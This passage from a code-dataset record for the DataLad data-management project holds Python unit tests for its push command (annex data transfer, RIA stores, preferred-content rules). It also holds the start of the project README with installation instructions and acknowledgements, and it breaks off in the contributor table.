elevate the difficulty a little\n path=str(test_file.relative_to(top.pathobj).parent))\n assert_status('ok', res)\n assert_in_results(res, action='publish', type='dataset', path=top.path)\n 
assert_in_results(res, action='publish', type='dataset', path=sub.path)\n assert_in_results(res, action='copy', type='file', path=str(test_file))\n # the lowest-level subdataset isn't touched\n assert_not_in_results(\n res, action='publish', type='dataset', path=subsub.path)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_force_checkdatapresent(srcpath=None, dstpath=None):\n src = Dataset(srcpath).create()\n target = mk_push_target(src, 'target', dstpath, annex=True, bare=True)\n (src.pathobj / 'test_mod_annex_file').write_text(\"Heavy stuff.\")\n src.save(to_git=False, message=\"New annex file\")\n assert_repo_status(src.path, annex=True)\n whereis_prior = src.repo.whereis(files=['test_mod_annex_file'])[0]\n\n res = src.push(to='target', data='nothing')\n # nothing reported to be copied\n assert_not_in_results(res, action='copy')\n # we got the git-push nevertheless\n eq_(src.repo.get_hexsha(DEFAULT_BRANCH), target.get_hexsha(DEFAULT_BRANCH))\n # nothing moved\n eq_(whereis_prior, src.repo.whereis(files=['test_mod_annex_file'])[0])\n\n # now a push without forced no-transfer\n # we do not give since, so the non-transfered file is picked up\n # and transferred\n res = src.push(to='target', force=None)\n # no branch change, done before\n assert_in_results(res, action='publish', status='notneeded',\n refspec=DEFAULT_REFSPEC)\n # but availability update\n assert_in_results(res, action='publish', status='ok',\n refspec='refs/heads/git-annex:refs/heads/git-annex')\n assert_in_results(res, status='ok',\n path=str(src.pathobj / 'test_mod_annex_file'),\n action='copy')\n # whereis info reflects the change\n ok_(len(whereis_prior) < len(\n src.repo.whereis(files=['test_mod_annex_file'])[0]))\n\n # do it yet again will do nothing, because all is up-to-date\n assert_status('notneeded', src.push(to='target', force=None))\n # an explicit reference point doesn't change that\n assert_status('notneeded',\n src.push(to='target', force=None, since='HEAD~1'))\n\n # now force data transfer\n res = src.push(to='target', force='checkdatapresent')\n # no branch change, done before\n assert_in_results(res, action='publish', status='notneeded',\n refspec=DEFAULT_REFSPEC)\n # no availability update\n assert_in_results(res, action='publish', status='notneeded',\n refspec='refs/heads/git-annex:refs/heads/git-annex')\n # but data transfer\n assert_in_results(res, status='ok',\n path=str(src.pathobj / 'test_mod_annex_file'),\n action='copy')\n\n # force data transfer, but data isn't available\n src.repo.drop('test_mod_annex_file')\n res = src.push(to='target', path='.', force='checkdatapresent', on_failure='ignore')\n assert_in_results(res, status='impossible',\n path=str(src.pathobj / 'test_mod_annex_file'),\n action='copy',\n message='Slated for transport, but no content present')\n\n\n@known_failure_githubci_win # recent git-annex, https://github.com/datalad/datalad/issues/7185\n@with_tempfile(mkdir=True)\n@with_tree(tree={'ria-layout-version': '1\\n'})\ndef test_ria_push(srcpath=None, dstpath=None):\n # complex test involving a git remote, a special remote, and a\n # publication dependency\n src = Dataset(srcpath).create()\n testfile = src.pathobj / 'test_mod_annex_file'\n testfile.write_text(\"Heavy stuff.\")\n src.save()\n assert_status(\n 'ok',\n src.create_sibling_ria(\n \"ria+{}\".format(get_local_file_url(dstpath, compatibility='git')),\n \"datastore\", new_store_ok=True))\n res = src.push(to='datastore')\n assert_in_results(\n res, action='publish', target='datastore', status='ok',\n 
refspec=DEFAULT_REFSPEC)\n assert_in_results(\n res, action='publish', target='datastore', status='ok',\n refspec='refs/heads/git-annex:refs/heads/git-annex')\n assert_in_results(\n res, action='copy', target='datastore-storage', status='ok',\n path=str(testfile))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_gh1426(origin_path=None, target_path=None):\n # set up a pair of repos, one the published copy of the other\n origin = Dataset(origin_path).create()\n target = mk_push_target(\n origin, 'target', target_path, annex=True, bare=False)\n origin.push(to='target')\n assert_repo_status(origin.path)\n assert_repo_status(target.path)\n eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),\n target.get_hexsha(DEFAULT_BRANCH))\n\n # gist of #1426 is that a newly added subdataset does not cause the\n # superdataset to get published\n origin.create('sub')\n assert_repo_status(origin.path)\n neq_(origin.repo.get_hexsha(DEFAULT_BRANCH),\n target.get_hexsha(DEFAULT_BRANCH))\n # now push\n res = origin.push(to='target')\n assert_result_count(\n res, 1, status='ok', type='dataset', path=origin.path,\n action='publish', target='target', operations=['fast-forward'])\n eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),\n target.get_hexsha(DEFAULT_BRANCH))\n\n\n@skip_if_adjusted_branch # gh-4075\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@with_tree(tree={'1': '123'})\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_publish_target_url(src=None, desttop=None, desturl=None):\n # https://github.com/datalad/datalad/issues/1762\n ds = Dataset(src).create(force=True)\n ds.save('1')\n ds.create_sibling('ssh://datalad-test:%s/subdir' % desttop,\n name='target',\n target_url=desturl + 'subdir/.git')\n results = ds.push(to='target')\n assert results\n ok_file_has_content(Path(desttop, 'subdir', '1'), '123')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\n@with_tempfile()\n@with_tempfile()\ndef test_gh1763(src=None, target1=None, target2=None, target3=None):\n # this test is very similar to test_publish_depends, but more\n # comprehensible, and directly tests issue 1763\n src = Dataset(src).create(force=True, **ckwa)\n targets = [\n mk_push_target(src, f'target{i}', t, bare=False)\n for i, t in enumerate([target1, target2, target3])\n ]\n src.siblings('configure', name='target0',\n publish_depends=['target1', 'target2'],\n **ckwa)\n # a file to annex\n (src.pathobj / 'probe1').write_text('probe1')\n src.save('probe1', to_git=False, **ckwa)\n # make sure the probe is annexed, not straight in Git\n assert_in('probe1', src.repo.get_annexed_files(with_content_only=True))\n # publish to target0, must handle dependency\n src.push(to='target0', **ckwa)\n for target in targets:\n # with a managed branch we are pushing into the corresponding branch\n # and do not see a change in the worktree\n if not target.is_managed_branch():\n # direct test for what is in the checkout\n assert_in(\n 'probe1',\n target.get_annexed_files(with_content_only=True))\n # ensure git-annex knows this target has the file\n assert_in(target.config.get('annex.uuid'),\n src.repo.whereis(['probe1'])[0])\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_gh1811(srcpath=None, clonepath=None):\n orig = Dataset(srcpath).create()\n (orig.pathobj / 'some').write_text('some')\n orig.save()\n clone = Clone.__call__(source=orig.path, path=clonepath)\n (clone.pathobj / 'somemore').write_text('somemore')\n clone.save()\n clone.repo.call_git(['checkout', 'HEAD~1'])\n res = clone.push(to=DEFAULT_REMOTE, 
on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(\n res, 1,\n path=clone.path, type='dataset', action='publish',\n status='impossible',\n message='There is no active branch, cannot determine remote '\n 'branch',\n )\n\n\n# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't\n# work ATM\n@skip_if_adjusted_branch\n@with_tempfile()\n@with_tempfile()\ndef test_push_wanted(srcpath=None, dstpath=None):\n src = Dataset(srcpath).create()\n (src.pathobj / 'data.0').write_text('0')\n (src.pathobj / 'secure.1').write_text('1')\n (src.pathobj / 'secure.2').write_text('2')\n src.save()\n\n # Dropping a file to mimic a case of simply not having it locally (thus not\n # to be \"pushed\")\n src.drop('secure.2', reckless='kill')\n\n # Annotate sensitive content, actual value \"verysecure\" does not matter in\n # this example\n src.repo.set_metadata(\n add={'distribution-restrictions': 'verysecure'},\n files=['secure.1', 'secure.2'])\n\n src.create_sibling(\n dstpath,\n annex_wanted=\"not metadata=distribution-restrictions=*\",\n name='target',\n )\n # check that wanted is obeyed, since set in sibling configuration\n res = src.push(to='target')\n assert_in_results(\n res, action='copy', path=str(src.pathobj / 'data.0'), status='ok')\n for p in ('secure.1', 'secure.2'):\n assert_not_in_results(res, path=str(src.pathobj / p))\n assert_status('notneeded', src.push(to='target'))\n\n # check the target to really make sure\n dst = Dataset(dstpath)\n # normal file, yes\n eq_((dst.pathobj / 'data.0').read_text(), '0')\n # secure file, no\n if dst.repo.is_managed_branch():\n neq_((dst.pathobj / 'secure.1').read_text(), '1')\n else:\n assert_raises(FileNotFoundError, (dst.pathobj / 'secure.1').read_text)\n\n # reset wanted config, which must enable push of secure file\n src.repo.set_preferred_content('wanted', '', remote='target')\n res = src.push(to='target')\n assert_in_results(res, path=str(src.pathobj / 'secure.1'))\n eq_((dst.pathobj / 'secure.1').read_text(), '1')\n\n\n# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't\n# work ATM\n@skip_if_adjusted_branch\n@slow # 10sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_auto_data_transfer(path=None):\n path = Path(path)\n ds_a = Dataset(path / \"a\").create()\n (ds_a.pathobj / \"foo.dat\").write_text(\"foo\")\n ds_a.save()\n\n # Should be the default, but just in case.\n ds_a.repo.config.set(\"annex.numcopies\", \"1\", scope=\"local\")\n ds_a.create_sibling(str(path / \"b\"), name=\"b\")\n\n # With numcopies=1, no data is copied with data=\"auto\".\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_not_in_results(res, action=\"copy\")\n\n # Even when a file is explicitly given.\n res = ds_a.push(to=\"b\", path=\"foo.dat\", data=\"auto\", since=None)\n assert_not_in_results(res, action=\"copy\")\n\n # numcopies=2 changes that.\n ds_a.repo.config.set(\"annex.numcopies\", \"2\", scope=\"local\")\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_in_results(\n res, action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"foo.dat\"))\n\n # --since= limits the files considered by --auto.\n (ds_a.pathobj / \"bar.dat\").write_text(\"bar\")\n ds_a.save()\n (ds_a.pathobj / \"baz.dat\").write_text(\"baz\")\n ds_a.save()\n res = ds_a.push(to=\"b\", data=\"auto\", since=\"HEAD~1\")\n assert_not_in_results(\n res,\n action=\"copy\", path=str(ds_a.pathobj / \"bar.dat\"))\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n 
path=str(ds_a.pathobj / \"baz.dat\"))\n\n # --auto also considers preferred content.\n ds_a.repo.config.unset(\"annex.numcopies\", scope=\"local\")\n ds_a.repo.set_preferred_content(\"wanted\", \"nothing\", remote=\"b\")\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_not_in_results(\n res,\n action=\"copy\", path=str(ds_a.pathobj / \"bar.dat\"))\n\n ds_a.repo.set_preferred_content(\"wanted\", \"anything\", remote=\"b\")\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"bar.dat\"))\n\n\n# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't\n# work ATM\n@skip_if_adjusted_branch\n@slow # 16sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_auto_if_wanted_data_transfer_path_restriction(path=None):\n path = Path(path)\n ds_a = Dataset(path / \"a\").create()\n ds_a_sub0 = ds_a.create(\"sub0\")\n ds_a_sub1 = ds_a.create(\"sub1\")\n\n for ds in [ds_a, ds_a_sub0, ds_a_sub1]:\n (ds.pathobj / \"sec.dat\").write_text(\"sec\")\n (ds.pathobj / \"reg.dat\").write_text(\"reg\")\n ds_a.save(recursive=True)\n\n ds_a.create_sibling(str(path / \"b\"), name=\"b\",\n annex_wanted=\"not metadata=distribution-restrictions=*\",\n recursive=True)\n for ds in [ds_a, ds_a_sub0, ds_a_sub1]:\n ds.repo.set_metadata(add={\"distribution-restrictions\": \"doesntmatter\"},\n files=[\"sec.dat\"])\n\n # wanted-triggered --auto can be restricted to subdataset...\n res = ds_a.push(to=\"b\", path=\"sub0\", data=\"auto-if-wanted\",\n recursive=True)\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"reg.dat\"))\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub0.pathobj / \"reg.dat\"))\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub0.pathobj / \"sec.dat\"))\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub1.pathobj / \"reg.dat\"))\n\n # ... 
and to a wanted file.\n res = ds_a.push(to=\"b\", path=\"reg.dat\", data=\"auto-if-wanted\",\n recursive=True)\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"reg.dat\"))\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub1.pathobj / \"reg.dat\"))\n\n # But asking to transfer a file does not do it if the remote has a\n # wanted setting and doesn't want it.\n res = ds_a.push(to=\"b\", path=\"sec.dat\", data=\"auto-if-wanted\",\n recursive=True)\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"sec.dat\"))\n\n res = ds_a.push(to=\"b\", path=\"sec.dat\", data=\"anything\", recursive=True)\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"sec.dat\"))\n\n\n@with_tempfile(mkdir=True)\ndef test_push_git_annex_branch_when_no_data(path=None):\n path = Path(path)\n ds = Dataset(path / \"a\").create()\n target = mk_push_target(ds, \"target\", str(path / \"target\"),\n annex=False, bare=True)\n (ds.pathobj / \"f0\").write_text(\"0\")\n ds.save()\n ds.push(to=\"target\", data=\"nothing\")\n assert_in(\"git-annex\",\n {d[\"refname:strip=2\"]\n for d in target.for_each_ref_(fields=\"refname:strip=2\")})\n\n\n@known_failure_githubci_osx\n@with_tree(tree={\"ds\": {\"f0\": \"0\", \"f1\": \"0\", \"f2\": \"0\",\n \"f3\": \"1\",\n \"f4\": \"2\", \"f5\": \"2\"}})\ndef test_push_git_annex_branch_many_paths_same_data(path=None):\n path = Path(path)\n ds = Dataset(path / \"ds\").create(force=True)\n ds.save()\n mk_push_target(ds, \"target\", str(path / \"target\"),\n annex=True, bare=False)\n nbytes = sum(ds.repo.get_content_annexinfo(paths=[f])[f][\"bytesize\"]\n for f in [ds.repo.pathobj / \"f0\",\n ds.repo.pathobj / \"f3\",\n ds.repo.pathobj / \"f4\"])\n with swallow_logs(new_level=logging.DEBUG) as cml:\n res = ds.push(to=\"target\")\n assert_in(\"{} bytes of annex data\".format(nbytes), cml.out)\n # 3 files point to content already covered by another file.\n assert_result_count(res, 3,\n action=\"copy\", type=\"file\", status=\"notneeded\")\n\n\n@known_failure_githubci_osx\n@with_tree(tree={\"ds\": {\"f0\": \"0\"}})\ndef test_push_matching(path=None):\n path = Path(path)\n ds = Dataset(path / \"ds\").create(force=True)\n ds.config.set('push.default', 'matching', scope='local')\n ds.save()\n remote_ds = mk_push_target(ds, 'local', str(path / 'dssibling'),\n annex=True, bare=False)\n # that fact that the next one even runs makes sure that we are in a better\n # place than https://github.com/datalad/datalad/issues/4888\n ds.push(to='local')\n # and we pushed the commit in the current branch\n eq_(remote_ds.get_hexsha(DEFAULT_BRANCH),\n ds.repo.get_hexsha(DEFAULT_BRANCH))\n\n\n@slow # can run over 30 sec when running in parallel with n=2. 
Cannot force serial yet, see https://github.com/pytest-dev/pytest-xdist/issues/385\n@known_failure_githubci_win # recent git-annex, https://github.com/datalad/datalad/issues/7184\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_nested_pushclone_cycle_allplatforms(origpath=None, storepath=None, clonepath=None):\n if 'DATALAD_SEED' in os.environ:\n # we are using create-sibling-ria via the cmdline in here\n # this will create random UUIDs for datasets\n # however, given a fixed seed each call to this command will start\n # with the same RNG seed, hence yield the same UUID on the same\n # machine -- leading to a collision\n raise SkipTest(\n 'Test incompatible with fixed random number generator seed')\n # the aim here is this high-level test a std create-push-clone cycle for a\n # dataset with a subdataset, with the goal to ensure that correct branches\n # and commits are tracked, regardless of platform behavior and condition\n # of individual clones. Nothing fancy, just that the defaults behave in\n # sensible ways\n from datalad.cmd import WitlessRunner as Runner\n run = Runner().run\n\n # create original nested dataset\n with chpwd(origpath):\n run(['datalad', 'create', 'super'])\n run(['datalad', 'create', '-d', 'super', str(Path('super', 'sub'))])\n\n # verify essential linkage properties\n orig_super = Dataset(Path(origpath, 'super'))\n orig_sub = Dataset(orig_super.pathobj / 'sub')\n\n (orig_super.pathobj / 'file1.txt').write_text('some1')\n (orig_sub.pathobj / 'file2.txt').write_text('some1')\n with chpwd(orig_super.path):\n run(['datalad', 'save', '--recursive'])\n\n # TODO not yet reported clean with adjusted branches\n #assert_repo_status(orig_super.path)\n\n # the \"true\" branch that sub is on, and the gitsha of the HEAD commit of it\n orig_sub_corr_branch = \\\n orig_sub.repo.get_corresponding_branch() or orig_sub.repo.get_active_branch()\n orig_sub_corr_commit = orig_sub.repo.get_hexsha(orig_sub_corr_branch)\n\n # make sure the super trackes this commit\n assert_in_results(\n orig_super.subdatasets(),\n path=orig_sub.path,\n gitshasum=orig_sub_corr_commit,\n # TODO it should also track the branch name\n # Attempted: https://github.com/datalad/datalad/pull/3817\n # But reverted: https://github.com/datalad/datalad/pull/4375\n )\n\n # publish to a store, to get into a platform-agnostic state\n # (i.e. 
no impact of an annex-init of any kind)\n store_url = 'ria+' + get_local_file_url(storepath)\n with chpwd(orig_super.path):\n run(['datalad', 'create-sibling-ria', '--recursive',\n '-s', 'store', store_url, '--new-store-ok'])\n run(['datalad', 'push', '--recursive', '--to', 'store'])\n\n # we are using the 'store' sibling's URL, which should be a plain path\n store_super = AnnexRepo(orig_super.siblings(name='store')[0]['url'], init=False)\n store_sub = AnnexRepo(orig_sub.siblings(name='store')[0]['url'], init=False)\n\n # both datasets in the store only carry the real branches, and nothing\n # adjusted\n for r in (store_super, store_sub):\n eq_(set(r.get_branches()), set([orig_sub_corr_branch, 'git-annex']))\n\n # and reobtain from a store\n cloneurl = 'ria+' + get_local_file_url(str(storepath), compatibility='git')\n with chpwd(clonepath):\n run(['datalad', 'clone', cloneurl + '#' + orig_super.id, 'super'])\n run(['datalad', '-C', 'super', 'get', '--recursive', '.'])\n\n # verify that nothing has changed as a result of a push/clone cycle\n clone_super = Dataset(Path(clonepath, 'super'))\n clone_sub = Dataset(clone_super.pathobj / 'sub')\n assert_in_results(\n clone_super.subdatasets(),\n path=clone_sub.path,\n gitshasum=orig_sub_corr_commit,\n )\n\n for ds1, ds2, f in ((orig_super, clone_super, 'file1.txt'),\n (orig_sub, clone_sub, 'file2.txt')):\n eq_((ds1.pathobj / f).read_text(), (ds2.pathobj / f).read_text())\n\n # get status info that does not recursive into subdatasets, i.e. not\n # looking for uncommitted changes\n # we should see no modification reported\n assert_not_in_results(\n clone_super.status(eval_subdataset_state='commit'),\n state='modified')\n # and now the same for a more expensive full status\n assert_not_in_results(\n clone_super.status(recursive=True),\n state='modified')\n\n\n@with_tempfile\ndef test_push_custom_summary(path=None):\n path = Path(path)\n ds = Dataset(path / \"ds\").create()\n\n sib = mk_push_target(ds, \"sib\", str(path / \"sib\"), bare=False, annex=False)\n (sib.pathobj / \"f1\").write_text(\"f1\")\n sib.save()\n\n (ds.pathobj / \"f2\").write_text(\"f2\")\n ds.save()\n\n # These options are true by default and our tests usually run with a\n # temporary home, but set them to be sure.\n ds.config.set(\"advice.pushUpdateRejected\", \"true\", scope=\"local\")\n ds.config.set(\"advice.pushFetchFirst\", \"true\", scope=\"local\")\n with swallow_outputs() as cmo:\n ds.push(to=\"sib\", result_renderer=\"default\", on_failure=\"ignore\")\n assert_in(\"Hints:\", cmo.out)\n assert_in(\"action summary:\", cmo.out)\n" }, { "alpha_fraction": 0.6425247192382812, "alphanum_fraction": 0.6942142248153687, "avg_line_length": 98.33082580566406, "blob_id": "53098b3f32c34ddc5e160c1042735e3c2a2c6a46", "content_id": "da4530be302b785c19001ad5d50c6ae2a31f439f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 26579, "license_type": "permissive", "max_line_length": 625, "num_lines": 266, "path": "/README.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": " ____ _ _ _ \n | _ \\ __ _ | |_ __ _ | | __ _ __| |\n | | | | / _` | | __| / _` | | | / _` | / _` |\n | |_| | | (_| | | |_ | (_| | | |___ | (_| | | (_| |\n |____/ \\__,_| \\__| \\__,_| |_____| \\__,_| \\__,_|\n Read me\n\n[![DOI](https://joss.theoj.org/papers/10.21105/joss.03262/status.svg)](https://doi.org/10.21105/joss.03262)\n[![Travis tests 
status](https://app.travis-ci.com/datalad/datalad.svg?branch=master)](https://app.travis-ci.com/datalad/datalad)\n[![Build status](https://ci.appveyor.com/api/projects/status/github/datalad/datalad?branch=master&svg=true)](https://ci.appveyor.com/project/mih/datalad/branch/master)\n[![Extensions](https://github.com/datalad/datalad/actions/workflows/test_extensions.yml/badge.svg)](https://github.com/datalad/datalad/actions/workflows/test_extensions.yml)\n[![Linters](https://github.com/datalad/datalad/actions/workflows/lint.yml/badge.svg)](https://github.com/datalad/datalad/actions/workflows/lint.yml)\n[![codecov.io](https://codecov.io/github/datalad/datalad/coverage.svg?branch=master)](https://codecov.io/github/datalad/datalad?branch=master)\n[![Documentation](https://readthedocs.org/projects/datalad/badge/?version=latest)](http://datalad.rtfd.org)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![GitHub release](https://img.shields.io/github/release/datalad/datalad.svg)](https://GitHub.com/datalad/datalad/releases/)\n[![Supported Python versions](https://img.shields.io/pypi/pyversions/datalad)](https://pypi.org/project/datalad/)\n[![Testimonials 4](https://img.shields.io/badge/testimonials-4-brightgreen.svg)](https://github.com/datalad/datalad/wiki/Testimonials)\n[![https://www.singularity-hub.org/static/img/hosted-singularity--hub-%23e32929.svg](https://www.singularity-hub.org/static/img/hosted-singularity--hub-%23e32929.svg)](https://singularity-hub.org/collections/667)\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](https://github.com/datalad/datalad/blob/master/CODE_OF_CONDUCT.md)\n[![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.808846.svg)](https://doi.org/10.5281/zenodo.808846)\n[![RRID](https://img.shields.io/badge/RRID-SCR__003931-blue)](https://identifiers.org/RRID:SCR_003931)\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-49-orange.svg?style=flat-square)](#contributors-)\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n\n## Distribution\n\n[![Anaconda](https://anaconda.org/conda-forge/datalad/badges/version.svg)](https://anaconda.org/conda-forge/datalad)\n[![Arch (AUR)](https://repology.org/badge/version-for-repo/aur/datalad.svg?header=Arch%20%28%41%55%52%29)](https://repology.org/project/datalad/versions)\n[![Debian Stable](https://badges.debian.net/badges/debian/stable/datalad/version.svg)](https://packages.debian.org/stable/datalad)\n[![Debian Unstable](https://badges.debian.net/badges/debian/unstable/datalad/version.svg)](https://packages.debian.org/unstable/datalad)\n[![Fedora Rawhide package](https://repology.org/badge/version-for-repo/fedora_rawhide/datalad.svg?header=Fedora%20%28rawhide%29)](https://repology.org/project/datalad/versions)\n[![Gentoo (::science)](https://repology.org/badge/version-for-repo/gentoo_ovl_science/datalad.svg?header=Gentoo%20%28%3A%3Ascience%29)](https://repology.org/project/datalad/versions)\n[![PyPI package](https://repology.org/badge/version-for-repo/pypi/datalad.svg?header=PyPI)](https://repology.org/project/datalad/versions)\n\n# 10000-ft. overview\n\nDataLad makes data management and data distribution more accessible.\nTo do that, it stands on the shoulders of [Git] and [Git-annex] to deliver a\ndecentralized system for data exchange. 
This includes automated ingestion of\ndata from online portals and exposing it in readily usable form as Git(-annex)\nrepositories, so-called datasets. The actual data storage and permission\nmanagement, however, remains with the original data providers.\n\nThe full documentation is available at http://docs.datalad.org and\nhttp://handbook.datalad.org provides a hands-on crash-course on DataLad.\n\n# Extensions\n\nA number of extensions are available that provide additional functionality for\nDataLad. Extensions are separate packages that are to be installed in addition\nto DataLad. In order to install DataLad customized for a particular domain, one\ncan simply install an extension directly, and DataLad itself will be\nautomatically installed with it. An [annotated list of\nextensions](http://handbook.datalad.org/extension_pkgs.html) is available in\nthe [DataLad handbook](http://handbook.datalad.org).\n\n\n# Support\n\nThe documentation for this project is found here:\nhttp://docs.datalad.org\n\nAll bugs, concerns, and enhancement requests for this software can be submitted here:\nhttps://github.com/datalad/datalad/issues\n\nIf you have a problem or would like to ask a question about how to use DataLad,\nplease [submit a question to\nNeuroStars.org](https://neurostars.org/new-topic?body=-%20Please%20describe%20the%20problem.%0A-%20What%20steps%20will%20reproduce%20the%20problem%3F%0A-%20What%20version%20of%20DataLad%20are%20you%20using%20%28run%20%60datalad%20--version%60%29%3F%20On%20what%20operating%20system%20%28consider%20running%20%60datalad%20plugin%20wtf%60%29%3F%0A-%20Please%20provide%20any%20additional%20information%20below.%0A-%20Have%20you%20had%20any%20luck%20using%20DataLad%20before%3F%20%28Sometimes%20we%20get%20tired%20of%20reading%20bug%20reports%20all%20day%20and%20a%20lil'%20positive%20end%20note%20does%20wonders%29&tags=datalad)\nwith a `datalad` tag. NeuroStars.org is a platform similar to StackOverflow\nbut dedicated to neuroinformatics.\n\nAll previous DataLad questions are available here:\nhttp://neurostars.org/tags/datalad/\n\n\n# Installation\n\n## Debian-based systems\n\nOn Debian-based systems, we recommend enabling [NeuroDebian], via which we\nprovide recent releases of DataLad. Once enabled, just do:\n\n apt-get install datalad\n\n## Gentoo-based systems\n\nOn Gentoo-based systems (i.e. all systems whose package manager can parse ebuilds as per the [Package Manager Specification]), we recommend [enabling the ::science overlay], via which we\nprovide recent releases of DataLad. Once enabled, just run:\n\n emerge datalad\n\n## Other Linux'es via conda\n\n conda install -c conda-forge datalad\n\nwill install the most recently released version, and release candidates are\navailable via\n\n conda install -c conda-forge/label/rc datalad\n\n## Other Linux'es, macOS via pip\n\nBefore you install this package, please make sure that you [install a recent\nversion of git-annex](https://git-annex.branchable.com/install). Afterwards,\ninstall the latest version of `datalad` from\n[PyPI](https://pypi.org/project/datalad). It is recommended to use\na dedicated [virtualenv](https://virtualenv.pypa.io):\n\n # Create and enter a new virtual environment (optional)\n virtualenv --python=python3 ~/env/datalad\n . ~/env/datalad/bin/activate\n\n # Install from PyPI\n pip install datalad\n\nBy default, installation via pip installs the core functionality of DataLad,\nallowing for managing datasets etc. 
Additional installation schemes\nare available, so you can request enhanced installation via\n`pip install datalad[SCHEME]`, where `SCHEME` could be:\n\n- `tests`\n to also install dependencies used by DataLad's battery of unit tests\n- `full`\n to install all dependencies.\n\nMore details on installation and initial configuration can be found in the\n[DataLad Handbook: Installation].\n\n# License\n\nMIT/Expat\n\n\n# Contributing\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) if you are interested in internals or\ncontributing to the project. \n\n## Acknowledgements\n\nThe DataLad project received support through the following grants:\n\n- US-German collaboration in computational neuroscience (CRCNS) project\n \"DataGit: converging catalogues, warehouses, and deployment logistics into a\n federated 'data distribution'\" (Halchenko/Hanke), co-funded by the US National\n Science Foundation (NSF 1429999) and the German Federal Ministry of\n Education and Research (BMBF 01GQ1411).\n\n- CRCNS US-German Data Sharing \"DataLad - a decentralized system for integrated\n discovery, management, and publication of digital objects of science\"\n (Halchenko/Pestilli/Hanke), co-funded by the US National Science Foundation\n (NSF 1912266) and the German Federal Ministry of Education and Research\n (BMBF 01GQ1905).\n\n- Helmholtz Research Center Jülich, FDM challenge 2022\n\n- German federal state of Saxony-Anhalt and the European Regional Development\n Fund (ERDF), Project: Center for Behavioral Brain Sciences, Imaging Platform\n\n- ReproNim project (NIH 1P41EB019936-01A1).\n\n- Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under grant\n SFB 1451 ([431549029](https://gepris.dfg.de/gepris/projekt/431549029),\n INF project)\n\n- European Union’s Horizon 2020 research and innovation programme under grant\n agreements:\n - [Human Brain Project SGA3 (H2020-EU.3.1.5.3, grant no. 945539)](https://cordis.europa.eu/project/id/945539)\n - [VirtualBrainCloud (H2020-EU.3.1.5.3, grant no. 
826421)](https://cordis.europa.eu/project/id/826421)\n\nMac mini instance for development is provided by\n[MacStadium](https://www.macstadium.com/).\n\n\n### Contributors ✨\n\nThanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):\n\n<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->\n<!-- prettier-ignore-start -->\n<!-- markdownlint-disable -->\n<table>\n <tbody>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/glalteva\"><img src=\"https://avatars2.githubusercontent.com/u/14296143?v=4?s=100\" width=\"100px;\" alt=\"glalteva\"/><br /><sub><b>glalteva</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=glalteva\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/adswa\"><img src=\"https://avatars1.githubusercontent.com/u/29738718?v=4?s=100\" width=\"100px;\" alt=\"adswa\"/><br /><sub><b>adswa</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=adswa\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/chrhaeusler\"><img src=\"https://avatars0.githubusercontent.com/u/8115807?v=4?s=100\" width=\"100px;\" alt=\"chrhaeusler\"/><br /><sub><b>chrhaeusler</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=chrhaeusler\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/soichih\"><img 